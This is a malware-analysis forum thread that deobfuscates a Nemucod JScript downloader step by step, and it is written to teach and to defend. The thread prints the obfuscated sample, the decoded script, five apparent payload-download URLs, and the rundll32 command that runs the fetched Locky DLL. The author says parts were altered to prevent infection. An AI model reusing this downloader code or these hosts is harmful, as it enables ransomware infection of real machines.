Malware Analysis Deobfuscation of script samples from MV 13-9-16 #4 (nemucod and cie)

DardiM · Sep 13, 2016

https://malwaretips.com/threads/13-9-16-4.63346/
(thanks to @Solarquest)

There are 3 samples that use scripts :

2 .js
3 tax_invoice_scan_PDF.B6B845F6.js
4 d7f8c742cd.html

3 and 4 are similar to (remember, I received one wave with insults inside

):

https://malwaretips.com/threads/new...rojandownloader-nemucod-asx-26_08_2016.62839/

2 .js is similar to :

https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/

PART 1 : tax_invoice_scan_PDF.B6B845F6.js

1) What it looks like when edited

var EIj = "__WYz~__Rv~__JXr~__GZj~__SSy~__Qx~__Ks~__JXr~__Ea~__FIn~__Dx~__UVj~__EBl~__Se~__Ea~__Ea~__Ea~__Ea~__HAb~__Tn~__EBs~__Ea~__Zq~__Lm~__Rl~__Qx~__Yb~__Rv~__Jy~__Oc~__WYz~__Rv~__Rl~__SSy~__Jy~__Oc~__Ea~__Yw~__Ea~__Qt~__Uf~__CQq~__Qt~__Vs~__Qt~__Qt~__Vs~__Qt~__GZj~__Qt~__Vs~__Qt~__EBs~__Qt~__Vs~__Qt~__Qx~__Qt~__Vs~
...
...
__Ea~__Dc~__Au~__Ge~__UVj~__Ea~__De~__Se~__Gx~__Gx~__Gx~__EBl~__St~__Gf~__Il~__FSz~__Yw~__QFr~__SSy~__Jc~__HTm~__KGb~__De~__Se~__Gx~__Gx~__FIn~__ULh~__Rl~__FIn~__Ea~__De~__Se~__Gx~__Gx~__Gx~__EBl~__St~__Gf~__Il~__FSz~__Yw~__Sh~__Qx~__Jc~__VEi~__QFr~__SSy~__Jc~__Wq~__HTm~__KGb~__De~__Se~__Gx~__Gx~__Sh~__Rv~__TDz~__TKe~__Rv~__Rl~__Lm~__Dx~__CQq~__SSy~__EBs~__Qx~__JXr~__Oc~__VEi~__DOy~__LGt~__Gp~__IDo~__Ea~__Vs~__Ea~__Ex~__Yr~__Rv~__Ea~__Vs~__Ea~__ITu~__Bi~__Tn~__FCk~__Wq~__Dx~__St~__Gf~__Il~__FSz~__UVj~__UVj~__HTm~__De~__Se~__Gx~__KGb~__De~__Se~__Gx~__De~__Se~__Gx~__Ex~__JXr~__Au~__Yw~__Sh~__Rv~__VEi~__Js~__CYg~__HAb~__Wk~__Wq~__Dx~__Qt~__Qt~__UVj~__HTm~__De~__Se~__Gx~__De~__Se~__Gx~__EBs~__FIn~__SSy~__Rv~__EBs~__JXr~__Ea~__Ex~__JXr~__Au~__HTm~__De~__Se~__KGb~__HTm~__De~__Se~__De~__Se".split('~');

var Fh = "";
var Ar = {
"__Se": (1, "\x0a"),
"__De": (1, "\x0d"),
"__CXb": (1, "D"),
"__GVc": (1, "H"),
"__Js": (1, "L"),
"__LGt": (1, "P"),
"__Jt": (1, "T"),
"__Bi": (1, "X"),
"__Gx": (1, "\x09"),
"__Jy": (1, "d"),
"__Lm": (1, "h"),
"__ULh": (1, "l"),
"__TKe": (1, "p"),
"__SSy": (1, "t"),
"__KGb": (1, "\x7d"),
"__KVp": (1, "\x7c"),
"__EBl": (1, "\x7b"),
"__Aj": (1, "\x2f"),
"__SYo": (1, "\x2d"),
"__TDz": (1, "\x2e"),
"__Vs": (1, "\x2b"),
"__TYm": (1, "\x2c"),
"__By": (1, "\x2a"),
"__CYg": (1, "C"),
"__Ex": (1, "G"),
"__DOy": (1, "K"),
"__SVx": (1, "O"),
"__CQq": (1, "S"),
"__Wy": (1, "\x25"),
"__Qt": (1, "\x22"),
"__Uf": (1, "W"),
"__Il": (1, "x"),
"__Dx": (1, "\x28"),
"__UVj": (1, "\x29"),
"__GZj": (1, "c"),
"__Oc": (1, "g"),
"__XEs": (1, "k"),
"__Ks": (1, "o"),
"__Rl": (1, "s"),
"__PAb": (1, "w"),
"__Ea": (1, "\x20"),
"__Yy": (1, "\x21"),
"__Dc": (1, "\x31"),
"__SJu": (1, "\x30"),
"__FSz": (1, "\x33"),
"__Au": (1, "\x32"),
"__Jc": (1, "\x35"),
"__IDo": (1, "\x34"),
"__Wk": (1, "\x37"),
"__VQt": (1, "\x36"),
"__FCk": (1, "\x39"),
"__Ge": (1, "\x38"),
"__Yd": (1, "\x3a"),
"__Uw": (1, "\x3c"),
"__HTm": (1, "\x3b"),
"__EUx": (1, "\x3e"),
"__Yw": (1, "\x3d"),
"__ITu": (1, "F"),
"__AKo": (1, "J"),
"__QFr": (1, "N"),
"__Nv": (1, "R"),
"__Sh": (1, "V"),
"__Id": (1, "Z"),
"__ZNc": (1, "b"),
"__TSe": (1, "\x40"),
"__WYz": (1, "f"),
"__Xg": (1, "j"),
"__JXr": (1, "n"),
"__EBs": (1, "r"),
"__HAb": (1, "v"),
"__TTk": (1, "z"),
"__Gf": (1, "B"),
"__Rv": (1, "u"),
"__WFm": (1, "A"),
"__ZIf": (1, "E"),
"__St": (1, "I"),
"__OPd": (1, "M"),
"__Oe": (1, "Q"),
"__Yr": (1, "U"),
"__QGw": (1, "Y"),
"__Tn": (1, "a"),
"__FIn": (1, "e"),
"__Qx": (1, "i"),
"__Ph": (1, "m"),
"__Gp": (1, "q"),
"__Zq": (1, "\x5f"),
"__La": (1, "\x5e"),
"__Wq": (1, "\x5d"),
"__Hm": (1, "\x5c"),
"__VEi": (1, "\x5b"),
"__Yb": (1, "y")
};

var Tg;
for (Tg = 0; Tg < EIj["l" + "e" + "n" + "g" + "th"]; Tg++) {
GWu = EIj[Tg];
Fh = (43, 35, Fh) + (25, 35, Ar[GWu]);
}
eval(Fh);

2) Explanations :

var EIj = " .........................".split('~');

=> A tab with the string as parameter, splited at each ('~') chars.
=> A tab of small strings

__WYz
__Rv
__JXr
__GZj
__SSy
__Qx
etc,..

var Fh = "";

=> used to get the first deobfuscated string of code

var Ar = {

"__Se": (1, "\x0a"),
"__De": (1, "\x0d"),
...
...

};

=> used as char replacement

var Tg;

=> index for the for Loop

for (Tg = 0; Tg < EIj["l" + "e" + "n" + "g" + "th"]; Tg++) {

GWu = EIj[Tg];
Fh = (43, 35, Fh) + (25, 35, Ar[GWu]);

}

=> can be written in a simplified way :

for (Tg = 0; Tg < EIj.length ; Tg++) {

GWu = EIj[Tg];
Fh = Fh + Ar[GWu]);

}

=> a Loop on each data of the first tab, each value is used as a key to retrieve the real value from the second Tab.

Example :

GWu = EIj[0];

=> __WYz

this key is searched on the second tab : Ar[GWu]

=> "__WYz": (1, "f"), <=> key: value

the way it's written on the second tab, is to obfuscate a bit more : (1, "f") => "f"

So each __WYz correspond to a "f"

Fh = Fh + Ar[GWu]);

=> concatenation / build of the "real part" put on Fh var

Example : the first chars : "function e()"

eval(Fh);

=> the string build by the loop, and in the var Fh, is evaluated => functions linked to real infection are run.

3) What it looks like after first deobfuscation :

function e() {

var _hsiyudgfustdg = "WS" + "" + "c" + "r" + "i" + "pt";
var _c = "\%Sy" + "st" + "" + "em" + "Root\%\\s" + "ystem32\\cmd." + "ex" + "e";
var _87867t67t6gt = this[_hsiyudgfustdg]["Cre"+"ateOb"+"ject"](_hsiyudgfustdg+".She"+"ll");
var _87g6sd5fg = _87867t67t6gt["En" + "vi" + "" + "ron" + "men" + "t"]("SY" + "S" + "T" + "E" + "M");
var _dd = _87g6sd5fg("Com" + "S" + "" + "pe" + "c");
if (_dd == _c) {
return 1;
} else {
this[this["_hsiyudgfustdg"]]["Qui" + "" + "t"](1);
};

}

e();

var LCv7 = "join" + "";
var FXa9 = "Code" + "";
var GUu = "har" + "";
var KPq4 = "fromC" + "";
var XQg1 = "ngth" + "";
var QLf = "le" + "";
var PVc6 = "close" + "";
var UEs = "le" + "";
var Oc = "ToFi" + "";
var Sr = "Save" + "";
var Zp5 = "Text" + "";
var Ia = "write" + "";
var Oy1 = "open" + "";
var QGo = "et" + "";
var MHl3 = "Chars" + "";
var Fd9 = "type" + "";
var NKk = "am" + "";
var St1 = "Stre" + "";
var TSw = "DB." + "";
var Zm = "O" + "";
var Nl9 = "D" + "";
var Tn8 = "A" + "";
var MJt = "ct" + "";
var Kk7 = "eObje" + "";
var REk = "Creat" + "";
var BUj = "push" + "";
var XUy3 = "eAt" + "";
var DOz = "Cod" + "";
var Ar5 = "char" + "";
var Iw = "gth" + "";
var Va = "len" + "";
var PGi5 = "ose" + "";
var EPt8 = "cl" + "";
var WGl5 = "Text" + "";
var Sp3 = "Read" + "";
var YRr3 = "mFile" + "";
var Yz0 = "ro" + "";
var YWz = "dF" + "";
var Uc = "Loa" + "";
var OCv5 = "n" + "";
var FJh = "ope" + "";
var Nr9 = "t" + "";
var Jw = "rse" + "";
var Ci6 = "Cha" + "";
var XOr5 = "type" + "";
var DJb6 = "am" + "";
var Ck = ".Stre" + "";
var YSr = "DB" + "";
var Lv2 = "O" + "";
var Vf = "D" + "";
var BFq6 = "A" + "";
var Oo2 = "ect" + "";
var BBi = "bj" + "";
var NRe5 = "ateO" + "";
var Jn3 = "Cre" + "";
var WXl8 = "h" + "";
var Yq0 = "lengt" + "";
var Lc0 = "ngth" + "";
var Wz = "le" + "";
var Re = "ice" + "";
var Ea0 = "spl" + "";
var JRe = "th" + "";
var JPf2 = "leng" + "";
var UKa = "th" + "";
var ECj5 = "leng" + "";
var JAu = "gth" + "";
var Lx = "len" + "";
var YBc = "th" + "";
var ZDn6 = "leng" + "";
var Kj = "th" + "";
var Oj = "leng" + "";
var Rs = "ep" + "";
var CNo5 = "Sle" + "";
var Yg1 = "23" + "";
var Pa = " 3" + "";
var Cg = "ty" + "";
var Pv3 = "er" + "";
var Eg = ",qw" + "";
var Aw6 = " " + "";
var NKm = "n" + "";
var TFn = "Ru" + "";
var Ir = "th" + "";
var Kp = "leng" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
var Bs5 = "ose" + "";
var Zg0 = "cl" + "";
var St0 = "e" + "";
var He = "Fil" + "";
var CKl8 = "veTo" + "";
var Cf3 = "Sa" + "";
var WMi = "ion" + "";
var Ym = "posit" + "";
var SKa9 = "dy" + "";
var ZYz = "Bo" + "";
var XTy = "nse" + "";
var PAw1 = "Respo" + "";
var Js = "ite" + "";
var DQq = "wr" + "";
var TGb7 = "type" + "";
var RXm8 = "open" + "";
var ZJo = "eam" + "";
var Ba1 = "Str" + "";
var OPp = "DB." + "";
var Vm6 = "O" + "";
var EJz = "D" + "";
var Hz = "A" + "";
var KUa = "ject" + "";
var EBq9 = "eOb" + "";
var HHk = "Creat" + "";
var CPi = "Sleep" + "";
var Sy3 = "d" + "";
var Yp = "sen" + "";
var Po = "th" + "";
var NXj9 = "leng" + "";
var Gg = "T" + "";
var YPc = "GE" + "";
var DFa = "open" + "";
var TYr1 = "ngth" + "";
var Cl1 = "le" + "";
var Pi9 = "Quit" + "";
var FXo = "cript" + "";
var DAn2 = "WS" + "";
var YIa = "xists" + "";
var Qb8 = "leE" + "";
var Vn1 = "Fi" + "";
var Yu = "xt" + "";
var Hs = ".t" + "";
var Lp = "sts" + "";
var LLv = "eExi" + "";
var Te2 = "Fil" + "";
var YHq9 = "ject" + "";
var VTi = "mOb" + "";
var DVr = "te" + "";
var Qc0 = "Sys" + "";
var JRt8 = ".File" + "";
var HHy = "ting" + "";
var WHr0 = "Scrip" + "";
var DCx = "ct" + "";
var MRa = "eObje" + "";
var XHv = "Creat" + "";
var QUd3 = "h" + "";
var Kl = "gt" + "";
var IOi = "len" + "";
var DFe5 = "t.5.1" + "";
var Nq0 = "eques" + "";
var Sz9 = "pR" + "";
var Yu8 = "tt" + "";
var OJe1 = "WinH" + "";
var EMb = "ttp." + "";
var Mu = "WinH" + "";
var Jm1 = "P" + "";
var IVz = "MLHTT" + "";
var Ty0 = "2.X" + "";
var Bp = "ML" + "";
var LCo = "MSX" + "";
var IZr = "or" + "";
var FAt8 = "flo" + "";
var YZa3 = "%SystemRoot%\\system32\\rundll32.exe" + "";
var ZUi4 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";
var QNu = "d64" + "";
var ZEn2 = "am" + "";
var Vn0 = "RE" + "";
var LGx0 = "TECTU" + "";
var DSl = "RCHI" + "";
var GNu0 = "R_A" + "";
var Jz = "CESSO" + "";
var Cd = "PRO" + "";
var Nu = "tem" + "";
var KPm = "Sys" + "";
var Ay1 = "ll" + "";
var Dc = ".d" + "";
var Ag = "rY" + "";
var DXl1 = "EZP" + "";
var TPc8 = "wQ" + "";
var Ri6 = "VfqAQ" + "";
var OPo = "P%/" + "";
var Nz = "%TEM" + "";
var Tp7 = "ll" + "";
var PVg7 = ".She" + "";
var OHb = "pt" + "";
var Fk = "ri" + "";
var LSk = "WSc" + "";
var Xf0 = "ect" + "";
var Lf4 = "eObj" + "";
var MOq = "Creat" + "";
var Lc = "gb" + "";
var Ty = "gn" + "";
var QNd = "72" + "";
var Td = "om/f" + "";
var VPw3 = "y.c" + "";
var QXr = "ym" + "";
var Ik = "eh" + "";
var Zn1 = "il" + "";
var DVp = "m" + "";
var AZz = "/s" + "";
var Hl = ":/" + "";
var PDr = "http" + "";
var Ze8 = "ngb" + "";
var RHj = "/f72g" + "";
var UOz = "m" + "";
var Pu9 = "co" + "";
var LLy5 = "y." + "";
var IGq = "hym" + "";
var Cn = "ile" + "";
var MQh7 = "sm" + "";
var NHe3 = "/" + "";
var FAi2 = ":/" + "";
var AYh4 = "tp" + "";
var Ur8 = "ht" + "";
var Dn5 = "t" + "";
var VHj4 = "m1" + "";
var NZa2 = "b9" + "";
var TKb3 = "m/" + "";
var Vc2 = "o" + "";
var MEw1 = ".c" + "";
var YXv5 = "id" + "";
var Ak = "elr" + "";
var Po3 = "u" + "";
var QSu = "/d" + "";
var Ow4 = ":/" + "";
var WBq = "p" + "";
var ZCl = "htt" + "";
var Ls4 = "gk" + "";
var Dr = "d7" + "";
var Dq = "ds" + "";
var AGi8 = "om/" + "";
var LMc = "y.c" + "";
var Tv = "ur" + "";
var RHg6 = "dzeb" + "";
var Hu1 = "/a" + "";
var Rf = ":/" + "";
var SQk2 = "tp" + "";
var TAh2 = "ht" + "";
var Ta1 = "3ib4f" + "";
var Ad8 = "/e" + "";
var Gg2 = "et" + "";
var OIy = ".n" + "";
var DFt2 = "en" + "";
var HTq6 = "ay" + "";
var Za = "yd" + "";
var Tp6 = "://ma" + "";
var EQm1 = "tp" + "";
var LYu = "ht" + "";
var RUp6 = "437" + "";
var HAj = "th" + "";
var GZc = "ng" + "";
var Yq = "le" + "";
var YRz = "5" + "";
var Vo3 = "55" + "";
var HEk4 = "5555" + "";
var Pm2 = "5555" + "";
var OXa = "55555" + "";
var PAj0 = "5555" + "";
var Sq = "55" + "";
var Wh8 = "55" + "";
var AGf5 = "555" + "";
var ZIv = "555" + "";
var Ht4 = "55555" + "";
var Pe = "55555" + "";
var FLt = "5555" + "";
var JFt3 = "55555" + "";
var NRs4 = "55555" + "";
var Dm = "sfd" + "";
var Kh = "dfa" + "";
var Wm7 = "asfas" + "";
var Vc = "th" + "";
var Yf = "leng" + "";
var CTd5 = "55555" + "";
var Av = "gth" + "";
var ZJb = "len" + "";
var Bl8 = "5555" + "";
var Hg = "55555" + "";
var IOu = "5555" + "";
var KHx = "55" + "";
var Sd = "55" + "";
var QFz9 = "55555" + "";
var Bq = "5555" + "";
var Tz9 = "132" + "";
var Ai = "1123" + "";
var Xl3 = (Ai + Tz9, Bq + QFz9 + Sd + KHx + IOu + Hg + Bl8);
var ELs = Xl3[ZJb + Av];
var NQf6 = (CTd5);
var Uw = [18807, 7552, 23965];
var Nf = NQf6[ZJb + Av];
var SPz0 = (Wm7 + Kh + Dm, NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz);
var QAl8 = SPz0[ZJb + Av];
var XWe = 1;
var DAb4 = 2;
var GLq = 2;
var MBi0 = "437";
var TIk = [LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1, TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5, TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8, TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc];
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);
var Io = MTm6.ExpandEnvironmentStrings(Nz + OPo);
var Lp9 = Io + Ri6 + TPc8 + DXl1 + Ag;
var IVi2 = Lp9 + Dc + Ay1;
var Ww = MTm6.Environment(KPm + Nu);
if (Ww(Cd + Jz + GNu0 + DSl + LGx0 + Vn0).toLowerCase() == "amd64") {

var ENa6 = MTm6.ExpandEnvironmentStrings(ZUi4);

} else {

var ENa6 = MTm6.ExpandEnvironmentStrings(YZa3);

}

function random(range, s) {

s[0] = 171 * s[-6915 + 6915] % 30269;
s[1] = (5745 - 5573) * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[4353 - 4352] / 30307 + s[2] / 30323) % 1.0;
return Math[FAt8 + IZr](r * range);

}

var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];

for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {

try {
var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}

};

var El = "";
var fso = new ActiveXObject(WHr0 + HHy + JRt8 + Qc0 + DVr + VTi + YHq9);
var WBe = Uw.slice();
WBe[0] = Math.random() * 29999 | 0;
var Em = 0;
do {

if (fso[Te2 + LLv + Lp](IVi2)) {

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;
El = Lj4 + Hs + Yu;
if (fso[Te2 + LLv + Lp](El )) {
this[DAn2 + FXo][Pi9](0);
}

}
try {
if (0 == Em) {
var Gr = random_(TIk[ZJb + Av], WBe);
Ma6[DFa](YPc + Gg, TIk[Gr++ % TIk[ZJb + Av]], false);
Ma6[Yp + Sy3]();
while (Ma6.readystate < (1 * 4)) WScript[CPi](6 * 16 + 4);
var UFn4 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
UFn4[DFa]();
UFn4[TGb7] = XWe;
UFn4[DQq + Js](Ma6[PAw1 + XTy + ZYz + SKa9]);
UFn4[Ym + WMi] = 0;
UFn4[Cf3 + CKl8 + He + St0](Lp9 , GLq);
UFn4[Zg0 + Bs5]();
var JEc3 = HIi(Lp9 );
JEc3 = Kx1(JEc3);
if (JEc3[ZJb + Av] < (2703 - 2603) * 1024 || JEc3[ZJb + Av] > (74 * 3 + 8) * 1024) {
continue;
}
OMb(IVi2, JEc3);
Em = 1;
}
var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;
MTm6[TFn + NKm](ENa6 + Aw6 + Lj4 + Eg + Pv3 + Cg + Pa + Yg1);
WScript.Sleep(20000);
} catch (e) {
WScript[CPi](1000);
continue;
};

} while (1);
WScript.Quit(0);

function Kx1(IGv7) {

var Fm;
var AJf = Uw.slice();
for (var OPr3 = 6780 - 6780; OPr3 < IGv7[ZJb + Av]; OPr3++) {
IGv7[OPr3] ^= random(256, AJf);

}
var Yz = IGv7[IGv7[ZJb + Av] - 4] | IGv7[IGv7[ZJb + Av] - 3] << 8 | IGv7[IGv7[ZJb + Av] - 2] << 16 | IGv7[IGv7[ZJb + Av] - 1] << 24;
IGv7[Ea0 + Re](JEc3[ZJb + Av] - 4, 4);
Fm = ELs;
for (var OPr3 = 0; OPr3 < IGv7[ZJb + Av]; OPr3++) {

Fm = (Fm + IGv7[OPr3]) % 1000000000;

};
if (Fm != Yz) {
return [];
};
return IGv7;
};

function HIi(IDz0) {

var CJf2 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
CJf2[TGb7] = DAb4;
CJf2[Ci6 + Jw + Nr9] = MBi0;
CJf2[DFa]();
CJf2[Uc + YWz + Yz0 + YRr3](IDz0);
var Nq = CJf2[Sp3 + WGl5];
CJf2[Zg0 + Bs5]();
return IGi2 (Nq);

};

function IGi2 (MOk3) {

};

function OMb(IDz0, IGv7) {

var CJf2 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
CJf2[TGb7] = DAb4;
CJf2[Ci6 + Jw + Nr9] = MBi0;
CJf2[DFa]();
CJf2[Ia + Zp5](St(IGv7));
CJf2[Cf3 + CKl8 + He + St0](IDz0, 2);
CJf2[Zg0 + Bs5]();

};

function St(IGv7) {

return Gn2;
};

As usual I modified some parts to avoid copy-paste => save => run => infection

In bold, the main do..while "infinite" loop (once run, the script tries to download the obfuscated payload until it is successfully done and deobfuscated, or if the script is stopped)

=> the important parts of the script are easy to read only after var replacement

Example :

var LCv7 = "join" + "";
var FXa9 = "Code" + "";
var GUu = "har" + "";
var KPq4 = "fromC" + "";
var XQg1 = "ngth" + "";
var QLf = "le" + "";
var PVc6 = "close" + "";
var UEs = "le" + "";
var Oc = "ToFi" + "";
var Sr = "Save" + "";
var Zp5 = "Text" + "";
var Ia = "write" + "";
var Oy1 = "open" + "";

and later :

var TIk = [LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1, TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5, TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8, TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc];
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

=> Similar to previous analysis for nemucod / new locky as dll

An obfuscated payload is downloaded by the script, then deobfuscated by several decipher functions, XOR etc, to become a real .dll file (old version : exe file)

var YZa3 = "%SystemRoot%\\system32\\rundll32.exe" + "";
var ZUi4 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";

=> one of them is used to run the dll, depending on architecture of proc

Here for details (with some links to complete deobfuscated previous version)
https://malwaretips.com/threads/new...rojandownloader-nemucod-asx-26_08_2016.62839/

4) Important parts :

4-1) Connection :

var Zm6 = [ "MSXML2.XMLHTTP","WinHttp.WinHttpRequest.5.1"]

=> one of this methods used for connection (first available)

var Ma6 = WScript["CreateObject"](Zm6[index]);

4-2) URLs

var TIk = [

LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1,
TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5,
TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8,
TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc

];

With replacements :

http ://maydayen.net/e3ib4f
http: //adzebury.com/dsd7gk
http: //duelrid.com/b9m1t
http: //smilehymy.com/f72gngb
http: //smilehymy.com/f72gngb (not an error from me, it appears two times)

4-3) Payload

var Lp9 = Io + Ri6 + TPc8 + DXl1 + Ag;
var IVi2 = Lp9 + Dc + Ay1;

Io = MTm6.ExpandEnvironmentStrings(Nz + OPo)

Nz + OPo = "%TEMP%/"
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

MOq + Lf4 + Xf0 = "CreateObject"
LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"

Ri6 + TPc8 + DXl1 + Ag = "VfqAQwQEZPrY"

Dc + Ay1 = ".dll"

=> var IVi2 = "%TEMP%/VfqAQwQEZPrY.dll"

it uses the short path used by programs that require the earlier 8.3 file naming convention.

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;

=> VFQAQW~1.DLL

run => rundll32.exe %TEMP%\VFQAQW~1.DLL,qwerty 323

qwerty => function called
323 => parameter

New Locky ransomware as dll

5) Main Loop :

var El = "";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Em = 0;

var Uw = [18807, 7552, 23965];
var WBe = Uw.slice();

WBe[0] = Math.random() * 29999 | 0;

do {

if (fso.FileExists(dll_file)) {

var oFile = fso.GetFile(dll_file);
var dll_file_short = oFile.ShortPath;
El = dll_file_short + ".txt"

if (fso.FileExists(El)) {

this[WScript]["quit"](0);

}

}
try {

if (0 == Em) {

var Gr = random(Tab_Urls.length, WBe);
=> first call of their random function to obfuscate a bit more
=> here, it gives a random "good" index, to begin the loop in the urls tab

=> but only because Wbe first value is a random value

function random(range, s) {

s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);

}

oHttp.open("GET", Tab_Urls[Gr++ % Tab_Urls.length], false);

oHttp.send();

while (oHttp.readystate < 4)) WScript.Sleep(100);
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.open();
oStream.type = 1;
oStream.write(oHttp.ResponseBody);
oStream.position = 0;
oStream.SaveToFile(file , 2);
oStream.close();

var file_content = ReadTextFromFile_char_substitution_1(file);
file_content = deobfuscation( file_content);

if ( file_content.length < 102400 || file_content.length > 235520) {

continue;

}

WriteTextToFile_char_substitution_2(dll_file, file_content);
Em = 1;

}

var oFile = fso.GetFile(dll_file);

var dll_file_short = oFile.ShortPath;

MTm6.Run("...rundll32.exe" + " " + dll_file_short + ",qwerty 323");

WScript.Sleep(20000);

} catch (e) {

WScript.Sleep(1000);

continue;

};

} while (1);

WScript.Quit(0);

6) Random function - false random

function random(range, s) {

s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);

}

it takes two parameters, none part inside is linked to random

First time it is called

var Uw = [18807, 7552, 23965];

var WBe = Uw.slice(); => still [18807, 7552, 23965]

WBe[0] = Math.random() * 29999 | 0;
=> real random part : first value 18807 is replaced by a value between 0 and 29999

var Gr = random(Tab_Urls.length, WBe); => here random will only depends of WBe first value

Second time it is called : the famous XOR part (see previous analysis) :

for (var index =0 ; OPr3 < IGv7.length ; index++) {

IGv7[index] ^= random(256, AJf);

}

with AJf = Uw = [18807, 7552, 23965]; => never changes

=> this time, not a random value

=> 118

----------------------------------------------------------------------------------------------------
NEXT PART : 4 d7f8c742cd.html (quick because similar to above sample)
----------------------------------------------------------------------------------------------------

DardiM · Sep 14, 2016

PART 2 : d7f8c742cd.html

1) What it looks like when edited

<job id=1>
<script target="about:blank" language="JScript">
var PWf = ["__Lz", "__Dr", "__Yw", "__Zs", "__Id", "__GVj", "__LGq", "__Yw", "__Ss", "__FWb", "__Gl", "__DOv", "__KJn", "__Sa", "__Ss", "__Ss", "__Ss", "__Ss", "__KYm", "__Zc", "__Xe", "__Ss", "__EHy", "__EMm", "__Nw", "__GVj", "__Ts", "__Dr", "__EFn", "__Qf", "__Lz", "__Dr", "__Nw", "__Id", "__EFn", "__Qf", "__Ss", "__Dh", "__Ss", "__EWd", "__Xm", "__CJk", "__EWd", "__Qv", "__EWd", "__EWd", "__Qv", "__EWd", "__Zs", "__EWd", "__Qv", "__EWd", "__Xe", "__EWd", "__Qv", "__EWd", "__GVj", "__EWd", "__Qv", "__EWd", "__VKf", "__Id", "__EWd", "__ZMl", "__Sa", "__Ss", "__Ss", "__Ss", "__Ss", "__KYm", "__Zc", "__Xe", "__Ss", "__EHy", "__Zs", "__Ss", "__Dh", "__Ss", "__EWd", "__Ee", "__Gk", "__CJk", "__Ts", "__EWd", "__Qv", "__EWd", "__Nw", "__Id", "__EWd", "__Qv", "__EWd", "__EWd", "__Qv", "__EWd", "__FWb", "__PUe", "__EWd", "__Qv", "__EWd", "__AHd", "__LGq", "__LGq", "__Id", "__Ee", "__Gk", "__Ee", "__Ee", "__Nw", "__EWd", "__Qv", "__EWd", "__Ts", "__Nw", "__Id", "__FWb", "__PUe", "__Qz", "__ALu", "__Ee", "__Ee", "__Zs", "__PUe", "__EFn", "__Ig", "__EWd", "__Qv", "__EWd", "__FWb", "__Us", "__EWd",
...
...
